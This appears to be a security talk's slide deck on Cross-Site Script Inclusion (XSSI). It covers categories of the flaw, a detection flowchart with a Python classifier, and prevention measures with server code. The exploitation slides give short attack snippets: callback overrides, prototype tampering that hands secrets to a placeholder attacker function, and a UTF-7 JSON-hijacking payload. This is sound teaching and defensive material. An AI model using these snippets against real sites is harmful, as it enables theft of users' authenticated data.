Slide 1

Once upon a time…

Slide 2

… but all was not good: Same Origin Policy

Slide 3

BUT scripts (and JSONP) don't fall under the same strict SOP and can be included cross-domain, which is why we have …

Slide 4

XSSI - The Tale of a Fameless but Widespread Vulnerability

Veit Hailperin, @fenceposterror

Slide 5

Wait what?

Slide 6

NOOO! XSSHowmany?

www.malicious.net includes a script from www.your-bank.com and leaks data.

Slide 7

What About Ambient Authority?
▸ Works just the same as with CSRF
▸ Ambient authority information is sent cross-site
▸ Leaked information gets more interesting…

Slide 8

Example

Slide 9

The Script

Slide 10

The Code

Slide 11

The Leak

Slide 12

You Said Fameless?

Slide 13

"We observe that a third of the surveyed sites utilize dynamic JavaScript. […] more than 80% of the sites are susceptible to attacks via remote script inclusion."
- The Unexpected Dangers of Dynamic JavaScript, S. Lekies et al.

Slide 14

1. Categorizing XSSI

Slide 15

Categorizing XSSI (four categories, numbered 1 to 4 on the slide)
▸ Dynamic JavaScript
▸ Non-Script
▸ Static JavaScript requiring Authentication
▸ Static Script / JSONP*

* If the JSONP requires parameters, these need to be guessable

Slide 16

2. Finding XSSI

Slide 17

Finding XSSI Category 1
▸ Read the Code
▸ Grep for
  ▹ Public Keys
  ▹ Social Security Numbers
  ▹ Credit Card Numbers

Slide 18

Finding XSSI Category 2 and 3

Re-request the JavaScript file without authentication and check whether the response is a script.
▹ No → Script requires authentication
▹ Yes → Does the answer differ from the original?
   ▹ No → Script not dynamic
   ▹ Yes → Re-request the JavaScript file and check whether the answer differs again.
      ▹ Yes → Script probably generally dynamic
      ▹ No → Dynamic JS based on authentication
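The flowchart above as a runnable classifier, added here as an example (it is not the author's code or the DetectDynamicJS extension). `fetch` is an assumed stand-in for an HTTP client, `make_fake_fetch` is a constructed site with one endpoint per outcome, and the final "differs again" step re-issues the original authenticated request, which the slide leaves implicit.

```python
from typing import Callable, Optional, Tuple

# Assumed interface: fetch(url, cookie_header_or_None) -> (content_type, body).
Fetch = Callable[[str, Optional[str]], Tuple[str, str]]

SCRIPT_TYPES = ("application/javascript", "text/javascript",
                "application/x-javascript")

def is_script(content_type: str) -> bool:
    """Is the response served as a script at all (Content-Type check)?"""
    return content_type.split(";")[0].strip().lower() in SCRIPT_TYPES

def classify(url: str, session_cookie: str, fetch: Fetch) -> str:
    """Walk the category 2/3 flowchart for one JavaScript URL."""
    ctype, original = fetch(url, session_cookie)   # what the victim's browser gets
    if not is_script(ctype):
        return "not a script"
    # 1. Re-request without authentication: is the answer still a script?
    ctype, anon = fetch(url, None)
    if not is_script(ctype):
        return "script requires authentication"
    # 2. Does the unauthenticated answer differ from the original?
    if anon == original:
        return "script not dynamic"
    # 3. Re-issue the original (authenticated) request: does it differ again?
    _, again = fetch(url, session_cookie)
    if again != original:
        return "script probably generally dynamic"   # e.g. nonces, timestamps
    return "dynamic JS based on authentication"      # session data baked into JS

def make_fake_fetch() -> Fetch:
    """Constructed stand-in for a web site; not a real HTTP client."""
    calls = {"n": 0}

    def fetch(url: str, cookie: Optional[str]) -> Tuple[str, str]:
        calls["n"] += 1
        js = "application/javascript; charset=utf-8"
        if url == "/static.js":
            return js, "var version = '1.0';"
        if url == "/user.js":          # user data baked into the script
            who = "alice@example.com" if cookie else "anonymous"
            return js, f"var email = '{who}';"
        if url == "/nonce.js":         # changes on every request
            return js, f"var nonce = {calls['n']};"
        if url == "/private.js" and cookie:
            return js, "var apiKey = 'CONSTRUCTED-KEY';"
        return "text/html; charset=utf-8", "<html>login required</html>"
    return fetch
```

Running the classifier over the constructed endpoints yields one label per category, with `/user.js` being the case that matters for XSSI.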

Slide 19

Finding XSSI Category 4 – Non-Script / Browser Issues

These issues are related to browser security.

Server Response (the email value is a UTF-7 encoded string):
[{'friend':'luke','email': '+ACcAfQBdADsAYQBsAGUAcgB0 ACgAJw BNAGEAeQAgAHQAaABlACAAZgBv AHIAYwBlACAAYgBlACAAdw BpAHQAaAAgAHkAbwB1ACcAKQA7 AFsAewAnAGoAb wBiACcAOgAnAGQAbwBuAGU-'}]

Which translates to:
[{'friend':'luke','email': ''}];alert('May the force be with you');[{'job':'done'}]

Malicious Website example from http://www.thespanner.co.uk/2011/05/30/json-hijacking/

Slide 20

2. Exploiting XSSI

Slide 21

Case: Global Variable

some.js (Global Variables):

    var privateKey = "-----BEGIN RSA PRIVATE KEY-----\
    MIIEowIBAAKCAQEAvq7kdxjZq4naHB8jNTMrFsiSKhmf8rpsRWO0iS5EK/c+evvT\
    [redacted]
    9abcosxptnnP286cyq7whYysfe5HqODAwZJp5SGFPKqilWE1MBur\
    -----END RSA PRIVATE KEY-----",
        keys = [
          { name: 'Key No 1', apiKey: '0c8aab23-2ab5-46c5-a0f2-e52ecf7d6ea8', privateKey: privateKey },
          { name: 'Key No 2', apiKey: '1e4b8312-f767-43eb-a16b-d44d3e471198', privateKey: privateKey }
        ];

Cross-site page including some.js:

    alert(JSON.stringify(keys[0]));

Slide 22

Case: Function Override

Response:

    angular.callbacks._7({"status":STATUS,"body":{"demographics":{"email":......}}})

Including page, defined before the response is loaded:

    var angular = function () { return 1; };
    angular.callbacks = function () { return 1; };
    // callback name as AngularJS emits it (angular.callbacks._N)
    angular.callbacks._7 = function (leaked) {
        alert(JSON.stringify(leaked));
    };

Slide 23

Case: Provide Callback

Response:

    angular.callbacks._7({"status":STATUS,"body":{"demographics":{"email":......}}})

Including page names the JSONP callback itself and defines it:

    gimmethatdata = function (leaked) {
        alert(JSON.stringify(leaked));
    };

Slide 24

Case: Prototype Tampering

Included script:

    (function(){
        var arr = ["secret1", "secret2", "secret3"];
        // intends to slice off the first entry
        var x = arr.slice(1);
        ...
    })();

Including page, before the include:

    Array.prototype.slice = function(){
        // leaks ["secret1", "secret2", "secret3"]
        sendToAttackerBackend(this);
    };

Note: Example taken from S. Lekies paper

Slide 25

3. Preventing XSSI

Slide 26

Preventing XSSI
▸ No sensitive data in JavaScript files or JSONP callbacks
▸ Correct Content-Type
▸ X-Content-Type-Options: nosniff
▸ Anti-Cross-Site Request Forgery Token
▸ SameSite Cookie Attribute (draft!)
▸ Spread the word
▸ Report them
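The first five countermeasures applied server-side to the kind of endpoints the exploitation cases target, added here as an example (not the author's or any framework's code). The dict-based request and response shapes, the `SESSIONS` store and its values are constructed assumptions.

```python
import hmac
import json
from typing import Dict, Tuple

Response = Tuple[int, Dict[str, str], str]   # (status, headers, body)

# Constructed session store: session id -> (user record, per-session anti-CSRF token).
SESSIONS = {"s3ss10n": ({"email": "alice@example.com", "apiKey": "CONSTRUCTED-KEY"},
                        "tok-7f3a")}

# nosniff stops MIME sniffing, so a JSON or HTML body is never executed as
# script even when pulled in cross-site via <script src=...>.
SAFE_HEADERS = {"X-Content-Type-Options": "nosniff"}

def login_cookie(session_id: str) -> str:
    # SameSite keeps the cookie off cross-site subresource requests such as a
    # <script> include from another origin, removing the ambient authority.
    return f"session={session_id}; HttpOnly; Secure; SameSite=Lax"

def serve_user_json(cookies: Dict[str, str]) -> Response:
    """Preferred shape: sensitive data as JSON with the correct Content-Type,
    never as a JavaScript file or a JSONP callback."""
    headers = {**SAFE_HEADERS, "Content-Type": "application/json; charset=utf-8"}
    sess = SESSIONS.get(cookies.get("session", ""))
    if sess is None:
        return 401, headers, "{}"
    user, _ = sess
    # A JSON array is valid JavaScript (the category 4 hijack), so rely on the
    # Content-Type plus nosniff, not on the shape of the body.
    return 200, headers, json.dumps(user)

def serve_dynamic_script(cookies: Dict[str, str], query: Dict[str, str]) -> Response:
    """If a dynamic script is unavoidable, tie its URL to an anti-CSRF token
    that only same-origin pages can read; a cross-site include cannot supply it."""
    headers = {**SAFE_HEADERS, "Content-Type": "application/javascript; charset=utf-8"}
    sess = SESSIONS.get(cookies.get("session", ""))
    if sess is None:
        return 401, headers, "/* login required */"
    user, token = sess
    if not hmac.compare_digest(query.get("token", ""), token):
        return 403, headers, "/* missing or invalid token */"   # leak nothing
    return 200, headers, "var user = " + json.dumps(user) + ";"
```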

Slide 27

Links, References, Interesting Reads…
• http://jeremiahgrossman.blogspot.ch/2006/01/advanced-web-attack-techniques-using.html
• http://incompleteness.me/blog/2007/03/05/json-is-not-as-safe-as-people-think-it-is/
• http://www.thespanner.co.uk/2011/05/30/json-hijacking/
• http://phrack.org/issues/69/12.html
• https://www.mbsd.jp/Whitepaper/xssi.pdf
• https://www.usenix.org/system/files/conference/usenixsecurity15/sec15-paper-lekies.pdf
• http://sebastian-lekies.de/leak/
• http://miladbr.blogspot.ch/2013/03/cross-site-script-inclusion.html
• http://www.scip.ch/en/?labs.20160414

Slide 28

Released DetectDynamicJS, a Burp extension to make your life easier in finding XSSI
▸ Passive Scanner Module
▸ Filters for JSONP and Scripts
▸ It's in your Burp Store
▸ Currently only implemented for cookies

Slide 29

Thanks for listening! Questions?

@fenceposterror
[email protected]